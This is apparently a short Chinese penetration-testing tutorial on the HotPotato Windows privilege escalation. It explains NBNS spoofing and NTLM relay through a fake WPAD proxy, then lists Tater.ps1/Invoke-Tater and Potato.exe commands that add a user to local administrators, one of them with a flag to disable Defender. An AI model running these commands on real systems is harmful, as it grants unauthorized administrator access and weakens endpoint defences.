HotPotato提权

HotPotato提权

参考资料:

视频教程地址:https://www.bilibili.com/video/av91087772

该技术由两个已知的windows问题组成。1. NBNS欺骗 2.NTLM中继与伪造的WPAD代理服务器的实现

NBNS是广播UDP协议,用于Windows环境中常用的名称解析。

通过与SMB相同的协议进行的NTLM身份验证已由Microsoft修补,但是该技术使用HTTP到SMB身份验证以创建高特权服务,因为HTTP请求可能来自诸如Windows更新之类的高特权服务。 由于流量包含NTLM凭据,并且正在通过伪造的代理服务器传递,因此可以对其进行捕获并将其传递给本地SMB侦听器,以创建可以作为SYSTEM执行任何命令的服务。

引申出一个话题,编程能力到底重要不重要?对于渗透测试,coding是一个什么样的地位?黑客就是程序员吗?

水平高超的黑客必定掌握娴熟的编码能力,使用程序来达到自己的目的。

世界上的编程语言几十种上百种,是个人都不能完全掌握。只要完全掌握一种编程语言,加上一种脚本语言就够了。

掌握的越多越好? 二十一世纪是分工与合作的世纪,掌握的多不代表就精通。不如一个人掌握一个方面,然后与其他人合作。

1
2
3
4
5
6
7
8
9
10
11
#windows 7运行:
powershell.exe -nop -ep bypass
Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1

Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"

---
#windows 10运行:
powershell.exe -nop -ep bypass
Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1
Invoke-Tater -Trigger 2 -Command "net localgroup administrators user /add"

net user user


1
2
3
Potato.exe -ip 192.168.1.105 -cmd "C:\Windows\System32\cmd.exe -k net localgroup Administrators user /add" -disable_exhaust true -disable_defender true

运行失败